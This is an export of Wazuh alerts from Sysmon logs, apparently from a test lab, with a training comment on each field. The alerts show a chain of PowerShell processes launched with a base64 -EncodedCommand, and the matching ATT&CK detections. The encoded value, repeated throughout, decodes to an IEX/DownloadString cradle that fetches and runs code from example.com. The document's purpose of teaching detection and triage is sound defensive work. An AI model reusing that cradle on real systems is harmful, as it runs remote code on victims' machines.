agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535343.2697576 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:38.7316316Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350329 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:33.660
ProcessGuid: {94294ddc-c165-680a-d60c-000000000e00}
ProcessId: 7424
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c161-680a-d10c-000000000e00}
ParentProcessId: 5124
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:33.660 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c165-680a-d60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 7424 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c161-680a-d10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5124 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 120 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535343.2705639 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:40.0213264Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350331 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:39.967
ProcessGuid: {94294ddc-c165-680a-d60c-000000000e00}
ProcessId: 7424
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2tf3tc0d.fi2.ps1
CreationUtcTime: 2025-04-24 22:55:39.967
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:39.967 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c165-680a-d60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 7424 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2tf3tc0d.fi2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:39.967 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 117 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535344.2708404 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:42.7324746Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350363 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:41.633
ProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00}
ProcessId: 9948
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c165-680a-d60c-000000000e00}
ParentProcessId: 7424
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:41.633 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c16d-680a-df0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9948 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c165-680a-d60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 7424 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 121 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535344.2716467 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:42.9929079Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350364 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:42.952
ProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00}
ProcessId: 9948
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gaycvjfa.rkm.ps1
CreationUtcTime: 2025-04-24 22:55:42.952
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:42.952 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c16d-680a-df0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9948 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gaycvjfa.rkm.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:42.952 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 118 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535347.2719232 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:45.1744811Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350392 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:44.004
ProcessGuid: {94294ddc-c170-680a-e10c-000000000e00}
ProcessId: 9224
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00}
ParentProcessId: 9948
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:44.004 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
